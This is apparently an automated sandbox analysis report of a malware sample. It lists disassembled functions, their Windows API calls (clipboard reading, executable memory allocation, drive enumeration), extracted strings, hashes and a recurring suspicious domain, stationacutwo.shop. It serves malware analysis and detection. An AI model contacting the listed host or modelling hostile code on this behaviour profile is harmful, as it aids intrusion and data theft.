Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InformationVolume
String ID: :$C$\
API String ID: 2039140958-3809124531
Opcode ID: b57741232ffb6e73598f93c7f00eeeb02a7603dbf45da60c52946d2d023c1752
Instruction ID: 2590a99ba3b0c72c7e66251d0ec347311e8f8f9194a99d63403cb4ce77094994
Opcode Fuzzy Hash: b57741232ffb6e73598f93c7f00eeeb02a7603dbf45da60c52946d2d023c1752
Instruction Fuzzy Hash: D6F06574294301ABE314CF10DC17F1A72B0EF4670CF20892DB285EA2D0D7B9A914CB5E

Function 0040AD50 Relevance: 4.4, APIs: 1, Strings: 1, Instructions: 885COMMON

Download Yara Rule

APIs

GetProcessVersion.KERNEL32 ref: 0040B293

Strings

stationacutwo.shop, xrefs: 0040B213, 0040B86F

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ProcessVersion
String ID: stationacutwo.shop
API String ID: 2384128931-2554180252
Opcode ID: 432a895e5b0b5d69582a5782a23e25cb96b964410a594a96e99c41673f4b8d58
Instruction ID: cfb45cb272add0a556381fbbfeda1cdcc5bc5d21a2f16fa5a30a80d125961872
Opcode Fuzzy Hash: 432a895e5b0b5d69582a5782a23e25cb96b964410a594a96e99c41673f4b8d58
Instruction Fuzzy Hash: 8B926B70508B81CFD325DF38C444716BFE1AB56314F1886ADD4DA8B3E2D379A486CB9A

Function 00409C50 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 00409CAB

Strings

system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways, xrefs: 00409C7B

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ExitProcess
String ID: system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways
API String ID: 621844428-780655312
Opcode ID: e445ea224c7f5f9d20ce95abbf24a35e36d12e594bc5c45f363e9ccd3e65d695
Instruction ID: e011a743a575bc7d175a59a8ee7ea00b174ccc4e63c700a3dd24194b3452eabb
Opcode Fuzzy Hash: e445ea224c7f5f9d20ce95abbf24a35e36d12e594bc5c45f363e9ccd3e65d695
Instruction Fuzzy Hash: AAF01570C0C204C9EA20BB72824A66DB6D45F25348F10193FF9C6712D3DA3D8C06961F

Function 043E0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000400,?,?,043E0223,?,?), ref: 043E0E19
SetErrorMode.KERNELBASE(00000000,?,?,043E0223,?,?), ref: 043E0E1E

Memory Dump Source

Source File: 00000000.00000002.2032685971.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_43e0000_file.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 710bdeba04da3f72e34b9538f147e01b2aa694a07c7d933eb68b505741be5764
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 21D0123114513877D7002A95DC09BDD7B1CDF05B62F008021FB0DD9080C7B0954046E5

Function 0042BEB5 Relevance: 1.6, APIs: 1, Instructions: 99memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 0042BFC0

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: f2fc0ede1abc15ec2dd2f12e8828292f2aa3a96730a176a61e16883aafe3e80b
Instruction ID: 9afc8dc3159de63cfa5fca5a0affec39bb654b5632ddb90e03a39c80125b271e
Opcode Fuzzy Hash: f2fc0ede1abc15ec2dd2f12e8828292f2aa3a96730a176a61e16883aafe3e80b
Instruction Fuzzy Hash: FF516A70108B828ED325CF2CC544742FFE1BF96314F48869DD0EA8B792C774A589CB92

Function 004380CA Relevance: 1.6, APIs: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 00438149

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: eb6943abcd4e56cea1d11ed8e7b53dbd39a21d58b1a95ec35a1256948ab1f043
Instruction ID: e14af565a0c615a7b28f3c9094f3ace374284610f986dea6898fd892b6e8c086
Opcode Fuzzy Hash: eb6943abcd4e56cea1d11ed8e7b53dbd39a21d58b1a95ec35a1256948ab1f043
Instruction Fuzzy Hash: E4112C366053808FD71A8F18DCA19A4FBB2EFDA310729049FD1C587293CB396C16CB54

Function 0043603F Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 00436087

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9ca839f80c1904635c995e62e09cd20c8094038639c08bcf89c553a4c64d1a17
Instruction ID: a94989cabf76012165cf56b6457c58ff1dbdea88eacffe18d49513b8a1f6e70c
Opcode Fuzzy Hash: 9ca839f80c1904635c995e62e09cd20c8094038639c08bcf89c553a4c64d1a17
Instruction Fuzzy Hash: 49013C342492818FD729CF14D990A167BB3EFDF70973A86ADC1D107B6AC235A812CB94

Function 00437D4A Relevance: 1.5, APIs: 1, Instructions: 25libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(?,00000000,00000800,?,00000000,00000800), ref: 00437D68

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f39e2d20ee2b5a25ab3e6fc8db6ee475dc9a1fc7e29fea4d11f84a8ed548eca4
Instruction ID: 5b231e06ead02ded7a5862b21f392a61b61d73390fd841d62513dec36869542d
Opcode Fuzzy Hash: f39e2d20ee2b5a25ab3e6fc8db6ee475dc9a1fc7e29fea4d11f84a8ed548eca4
Instruction Fuzzy Hash: E7D067383807009BE1689B25EC91F16B266ABD6A00F31C919E14666AD486B0B4055A49

Function 00437FE0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNELBASE ref: 00437FE0

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: DrivesLogical
String ID:
API String ID: 999431828-0
Opcode ID: 8bacdd1a854ec9a57f8760d773d8a30e75d4ce186afb8feb54302bbf69a49313
Instruction ID: ab89375f5921908170439047bb91253a411584663df88da37cc81a179c41e8dd
Opcode Fuzzy Hash: 8bacdd1a854ec9a57f8760d773d8a30e75d4ce186afb8feb54302bbf69a49313
Instruction Fuzzy Hash: 30E0AEB1600B008FD7A0CF2AD982A16B7E1BB48608754292EE5869BB51D330F800CF48

Function 02A62395 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02A623E6

Memory Dump Source

Source File: 00000000.00000002.2032358738.0000000002A61000.00000040.00000020.00020000.00000000.sdmp, Offset: 02A61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a61000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: ee9687755605527705e6cc0f1c011fc842ac938b4976bf16862c40fc7ad071ae
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: DD113F79A40208EFDB01DF98C989E98BBF5EF08350F0580A4F9489B361D771EA50DF80

Non-executed Functions

Function 0042E590 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 127clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0042E5AD
GetWindowLongW.USER32 ref: 0042E5D0
GetClipboardData.USER32 ref: 0042E5E4
GlobalLock.KERNEL32 ref: 0042E609
GlobalUnlock.KERNEL32 ref: 0042E73B
CloseClipboard.USER32 ref: 0042E748

Strings

b, xrefs: 0042E666
l, xrefs: 0042E689
a, xrefs: 0042E670
c, xrefs: 0042E684
!, xrefs: 0042E652
W, xrefs: 0042E66B
c, xrefs: 0042E65C
[, xrefs: 0042E657
V, xrefs: 0042E661
n, xrefs: 0042E67F
P, xrefs: 0042E675

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: !$P$V$W$[$a$b$c$c$l$n
API String ID: 2832541153-442629251
Opcode ID: 7e12f9de1543f7934be25ee7d982225b7564dd2d07d77fb89e709f99be6f3000
Instruction ID: cb050f0fbfe2ccbf41b8d1e2de91d2715b77496d9b2bc792e36e077a2e6e7693
Opcode Fuzzy Hash: 7e12f9de1543f7934be25ee7d982225b7564dd2d07d77fb89e709f99be6f3000
Instruction Fuzzy Hash: D651577150C3908FD301EF29D44831EBFE0AB95308F440A2EF4D997292D7799949CBAB

Function 043EA8C7 Relevance: 23.0, Strings: 18, Instructions: 467COMMON

Download Yara Rule

Strings

AQNW, xrefs: 043EAE2F
>M(C, xrefs: 043EADF8
R5OK, xrefs: 043EADE2
X=G3, xrefs: 043EADCC
0, xrefs: 043EA93D
YC, xrefs: 043EAADB, 043EAB64
de, xrefs: 043EAEE6
hvkg, xrefs: 043EA9FF
VU, xrefs: 043EAE3A
z1{7, xrefs: 043EADD7
", xrefs: 043EAB88
9E?[, xrefs: 043EAE0E
3A%G, xrefs: 043EAE03
P!D', xrefs: 043EADAE
A%R;, xrefs: 043EADB6
)N/, xrefs: 043EAD9E
,Y._, xrefs: 043EAE19
%]kS, xrefs: 043EAE24

Memory Dump Source

Source File: 00000000.00000002.2032685971.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_43e0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: )N/$"$%]kS$,Y._$0$3A%G$9E?[$>M(C$A%R;$AQNW$P!D'$R5OK$VU$X=G3$YC$de$hvkg$z1{7
API String ID: 0-4040250002
Opcode ID: 70b56d956f6eaf4704e27b460a06c1e1e7aea07bb1cd0fd247906e868684cc14
Instruction ID: a7838830d92929f3a8abef3936a7e744360c12fa737b00657d720ef860c142bd
Opcode Fuzzy Hash: 70b56d956f6eaf4704e27b460a06c1e1e7aea07bb1cd0fd247906e868684cc14
Instruction Fuzzy Hash: 7B0245B0219381ABD318CF25C590BABBBE2AFC5708F549D2DE4D98B391D774E805CB52

Function 00401FA0 Relevance: 13.0, Strings: 10, Instructions: 492COMMON

Download Yara Rule

Strings

null, xrefs: 0040224E
true, xrefs: 00402119
{, xrefs: 00402305
K, xrefs: 00402690
0, xrefs: 00402043
false, xrefs: 00402131
WMs, xrefs: 0040232D
., xrefs: 00402049
[, xrefs: 00402208
., xrefs: 0040206E

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: .$.$0$WMs$[$false$null$true${$K
API String ID: 0-107743826
Opcode ID: de02633b246938cc163cc413dbd0edbfce1b6867af0e50f1f853cacdf913a7cb
Instruction ID: f142902fa1e6ce3baae2cc86dbd04551ffeb3ddbe79eb06f544bf6df4934ce3d
Opcode Fuzzy Hash: de02633b246938cc163cc413dbd0edbfce1b6867af0e50f1f853cacdf913a7cb
Instruction Fuzzy Hash: DAF101B0900305ABD7105F21DE4D727BAE4AF50308F19893EE985A73D2E7BED914CB5A

Function 043F0BB7 Relevance: 10.4, Strings: 8, Instructions: 384COMMON

Download Yara Rule

Strings

IV, xrefs: 043F0EB6
MJK, xrefs: 043F0CC9
]_, xrefs: 043F0E31
YC, xrefs: 043F0CA9
BG, xrefs: 043F0EC4
O], xrefs: 043F0EBD
(P, xrefs: 043F0EAF
stationacutwo.shop, xrefs: 043F0FCB

Memory Dump Source

Source File: 00000000.00000002.2032685971.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_43e0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: (P$BG$IV$MJK$O]$YC$stationacutwo.shop$]_
API String ID: 0-3710986456
Opcode ID: cfb8866de550451c46bd9c7a1d9a60ed1e3cd9b4b701d34c72d781ac8ea03cd9
Instruction ID: 1ce667fd11a0968ddd5a5a7ab868580b9cbd07e6277c3365743b960a3c9d37ce
Opcode Fuzzy Hash: cfb8866de550451c46bd9c7a1d9a60ed1e3cd9b4b701d34c72d781ac8ea03cd9
Instruction Fuzzy Hash: 34D1AC74104781CFE729CF29C4A0A22BBF2FF5A304B28995DD5D24B796C339E846CB94

Function 043F8EB7 Relevance: 9.2, Strings: 7, Instructions: 425COMMON

Download Yara Rule

Strings

Lm5k, xrefs: 043F8F09
;I9W, xrefs: 043F8ED1
xy, xrefs: 043F8F35
!, xrefs: 043F90F1
$]&[, xrefs: 043F8EE9
QS, xrefs: 043F90CD
Bmrs, xrefs: 043F92FF

Memory Dump Source

Source File: 00000000.00000002.2032685971.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_43e0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: !$$]&[$;I9W$Bmrs$Lm5k$xy$QS
API String ID: 0-3575319576
Opcode ID: 8c15867198181c1f2924db7d24c583630b302ca9443fdb6cc0363a8ed121a76f
Instruction ID: 372234c353ffa4db6cd7e416fb7d3588234d6e768693b7fb2783c8457de69d7d
Opcode Fuzzy Hash: 8c15867198181c1f2924db7d24c583630b302ca9443fdb6cc0363a8ed121a76f
Instruction Fuzzy Hash: CAC199B15083118BC718DF08C8A1B6BB7F1FF85364F099A1CE9D65B391E3B5A905CB92

Function 043F02A6 Relevance: 9.1, Strings: 7, Instructions: 394COMMON

Download Yara Rule

Strings

wt4e, xrefs: 043F0444
6)<w, xrefs: 043F0452
i~}n, xrefs: 043F043D
YC, xrefs: 043F041A
qg+#, xrefs: 043F044B
2]'_, xrefs: 043F0675
stationacutwo.shop, xrefs: 043F06F8

Memory Dump Source

Source File: 00000000.00000002.2032685971.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_43e0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 2]'_$6)<w$YC$i~}n$qg+#$stationacutwo.shop$wt4e
API String ID: 0-3386725333
Opcode ID: 50c42c1d84becb0313461bc77338cf0aedad803e3c412e3272055ea1d0b97813
Instruction ID: 945166b5787069666f9b69cd96b4123120c9368a83deecdf069bd7020c4332f0
Opcode Fuzzy Hash: 50c42c1d84becb0313461bc77338cf0aedad803e3c412e3272055ea1d0b97813
Instruction Fuzzy Hash: FAD17CB05047418FD728CF29C895726BBF1FF46300F248A9DE9E68B796E335A845CB85

Function 0040CBCC Relevance: 8.8, Strings: 7, Instructions: 92COMMON

Download Yara Rule

Strings

vY[, xrefs: 0040CD9F
]^_, xrefs: 0040CDA9
a1c3, xrefs: 0040CD3B
N)K+, xrefs: 0040CD77
W%G', xrefs: 0040CD6D
-ac, xrefs: 0040CBD1
mAo, xrefs: 0040CBE6

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: ]^_$mAo$-ac$N)K+$W%G'$a1c3$vY[
API String ID: 0-3936688744
Opcode ID: 63636f266ec569c27e36e02182617082bf3d66d7ca6434eabc7f1d19dc33352b
Instruction ID: 96cd1cd91511fc02f7d5853dfd94581ecd6a69b542adb32c7fbb0ed3e3133148
Opcode Fuzzy Hash: 63636f266ec569c27e36e02182617082bf3d66d7ca6434eabc7f1d19dc33352b
Instruction Fuzzy Hash: 5F51C7B4115B809FE2348F26E890B96BBB1BB56744F608E0DC2EB2BB55C734A045CF94

Function 004260F0 Relevance: 5.2, Strings: 4, Instructions: 231COMMON

Download Yara Rule

Strings

5SZ, xrefs: 004262DC
JJ]T, xrefs: 004262C8
YC, xrefs: 00426290
AHO:, xrefs: 004262BE

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: AHO:$JJ]T$YC$5SZ
API String ID: 0-2490005371
Opcode ID: 067bf047ce4d87f5ef8411ab42dff2969ccad379a605c93dba391fc7643b113d
Instruction ID: e94d2115965d1ab6ac96aac8376d1a40ab417ef6fefd94c623d280ac089919e2
Opcode Fuzzy Hash: 067bf047ce4d87f5ef8411ab42dff2969ccad379a605c93dba391fc7643b113d
Instruction Fuzzy Hash: E1916A74104B508BD326CF35D4A47A3BBE2BF9A304F544A4DC4EB0B286C77A7515CB99

Function 04406357 Relevance: 5.2, Strings: 4, Instructions: 231COMMON

Download Yara Rule

Strings

AHO:, xrefs: 04406525
YC, xrefs: 044064F7
JJ]T, xrefs: 0440652F
5SZ, xrefs: 04406543

Memory Dump Source

Source File: 00000000.00000002.2032685971.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_43e0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: AHO:$JJ]T$YC$5SZ
API String ID: 0-2490005371
Opcode ID: 93c61705f7cfdb66d6f95be42a6a0ae56f1579dd11871bcce3060bb6590f76c2
Instruction ID: 28761fd5605a91a7558645d9458d9e5d07b25e659ae53506ce1f3083ee949d47
Opcode Fuzzy Hash: 93c61705f7cfdb66d6f95be42a6a0ae56f1579dd11871bcce3060bb6590f76c2
Instruction Fuzzy Hash: 59917BB4104B408BD7268F35D4A47A3BBE2BF9A304F148A5DC4EB0B286C7767125CF95

Function 00422AC1 Relevance: 4.2, Strings: 3, Instructions: 401COMMON

Download Yara Rule

Strings

789:, xrefs: 00422F48
',$/, xrefs: 00422C06
4$#>, xrefs: 00422BF6

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: ',$/$4$#>$789:
API String ID: 0-1840935103
Opcode ID: 3807fc0ecdc95e45dc4cdb95a020cda3b0c27bd6ddcb8620fad60437b7e1cebc
Instruction ID: 3a3c7d2e22556545ba37e3b70c36f6a9ac53c660036a41dbf512def7203dd6ce
Opcode Fuzzy Hash: 3807fc0ecdc95e45dc4cdb95a020cda3b0c27bd6ddcb8620fad60437b7e1cebc
Instruction Fuzzy Hash: A4D1CC75A083519FD714CF29E88072BB7E2BBC9314F594A2DE98987392D774EC01CB86

Function 044017D7 Relevance: 4.1, Strings: 3, Instructions: 362COMMON

Download Yara Rule

Strings

/, xrefs: 04401BAB
%, xrefs: 04401BB3
789:, xrefs: 044018ED

Memory Dump Source

Source File: 00000000.00000002.2032685971.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_43e0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 789:$%$/
API String ID: 0-3498975593
Opcode ID: d2f73dc8301a412a5c5747fc455ffad99bfcd6725f5424367be8d5d7216d8b64
Instruction ID: ddae8d5a8a4c87cf81d7f802f158741b60a9daa84b7f1296a023bc8754c635fc
Opcode Fuzzy Hash: d2f73dc8301a412a5c5747fc455ffad99bfcd6725f5424367be8d5d7216d8b64
Instruction Fuzzy Hash: E6C1D0B1A083418BDB14DF18C880B2BB7E1EF95314F18893EE4C587391E736E965CB92

Function 043F83F9 Relevance: 4.1, Strings: 3, Instructions: 333COMMON

Download Yara Rule

Strings

65, xrefs: 043F865B
IO, xrefs: 043F84A8
m, xrefs: 043F8411

Memory Dump Source

Source File: 00000000.00000002.2032685971.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_43e0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 65$m$IO
API String ID: 0-3769717654
Opcode ID: 8fc31a7bd1d5c29bff9cb6d534a1f6030555883298265af9a5c8a5f6dbaede40
Instruction ID: 6ea7e345d63039409c42c628965b7e0ee09f7dc6edb0fa30ae462fa2dd1fb65c
Opcode Fuzzy Hash: 8fc31a7bd1d5c29bff9cb6d534a1f6030555883298265af9a5c8a5f6dbaede40
Instruction Fuzzy Hash: 7EC176B16083409BDB18DF04C891A6FBBE1EFD6398F14492CE9C95B361D734E985CB86

Function 043F7F91 Relevance: 4.0, Strings: 3, Instructions: 292COMMON

Download Yara Rule

Strings

guc{, xrefs: 043F824B
crvi, xrefs: 043F82B5
3, xrefs: 043F815A

Memory Dump Source

Source File: 00000000.00000002.2032685971.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_43e0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: crvi$guc{$3
API String ID: 0-3059600650
Opcode ID: 6aee983b1d10a6d1652b0eb12904589eb0463ddbdbfc9b2800f4525f7b5ccdb0
Instruction ID: 1445d6925a622cd328a8e259a4504e5686d4f312f8dc1fb5b97af6e1e61f43b7
Opcode Fuzzy Hash: 6aee983b1d10a6d1652b0eb12904589eb0463ddbdbfc9b2800f4525f7b5ccdb0
Instruction Fuzzy Hash: F1B1D27060C3818FD729CF28C8907AFBBE2AF96314F08996DE5D98B391D735A445CB52

Function 043E092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 043E09DC, 043E09DF, 043E09E4
l, xrefs: 043E0966
., xrefs: 043E095F

Memory Dump Source

Source File: 00000000.00000002.2032685971.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_43e0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: bb98f36ca8d85a44d45adbf33cc5c61ce713e7b3f3c51d6c7cf47f4b082ef43f
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 20318DB6901629CFDB14CF99C880AAEBBF9FF08324F14504AD541A7350D7B1FA45CBA4

Function 00405F30 Relevance: 3.4, Strings: 2, Instructions: 886COMMON

Download Yara Rule

Strings

0, xrefs: 00406950
8, xrefs: 00406948

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: e1ba4efd13e2896f79e3e28a8a5d518532810379ced532b95419972f373df089
Instruction ID: 6a8942316129381cb36dec3a3499666bc02a1d611bfa52d8fef7d6638abf240b
Opcode Fuzzy Hash: e1ba4efd13e2896f79e3e28a8a5d518532810379ced532b95419972f373df089
Instruction Fuzzy Hash: 5D8259716083409FD724CF28C840B9BBBE2BF88314F15892EF88A97391D779D955CB96

Function 043E6197 Relevance: 3.4, Strings: 2, Instructions: 886COMMON

Download Yara Rule

Strings

8, xrefs: 043E6BAF
0, xrefs: 043E6BB7

Memory Dump Source

Source File: 00000000.00000002.2032685971.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_43e0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: e1b6f605487822a9edefa4b6efc1f1d48239c7fffd323b51f84c4917a11a40e3
Instruction ID: b518c6b8d89e2211285593f3f63da6aa705e6cd5d362a0ae886d53146c057e75
Opcode Fuzzy Hash: e1b6f605487822a9edefa4b6efc1f1d48239c7fffd323b51f84c4917a11a40e3
Instruction Fuzzy Hash: 0882877160A3509FD724CF29C841BAEBBE2BF98314F44992DF88987391D371E945CB92

Function 00425920 Relevance: 3.1, Strings: 2, Instructions: 577COMMON

Download Yara Rule

Strings

", xrefs: 00425D20
", xrefs: 00425D9F

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: "$"
API String ID: 0-3758156766
Opcode ID: e05a8ae3efb2a6c724fc2625fe5086d7edb5dee3c1b2c383c4b986da929ae0ef
Instruction ID: 029d2a81860a4bde834f3ff3ae8034cf58d36d8025ef30e1c181660066ed2413
Opcode Fuzzy Hash: e05a8ae3efb2a6c724fc2625fe5086d7edb5dee3c1b2c383c4b986da929ae0ef
Instruction Fuzzy Hash: D9024871B087609FC714CF29E49463BB7D5AFC4314F988A2FE89987381D638DC45878A

Function 04404519 Relevance: 3.1, Strings: 2, Instructions: 577COMMON

Download Yara Rule

Strings

[M, xrefs: 044048FA
IP, xrefs: 04404901

Memory Dump Source

Source File: 00000000.00000002.2032685971.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_43e0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: IP$[M
API String ID: 0-4017197820
Opcode ID: ce0fd57049a8497041f3025252edbe4a0900f8cd1c514417a6ec2afda2d977d4
Instruction ID: 53886d77825a955eda282138ad89304318a4e61f015d884775ac5a9499cd2836
Opcode Fuzzy Hash: ce0fd57049a8497041f3025252edbe4a0900f8cd1c514417a6ec2afda2d977d4
Instruction Fuzzy Hash: 66222575200B018FD7258F29C890B66B7E1FF46314F14895ED9AA8BBA1E738F851CB94

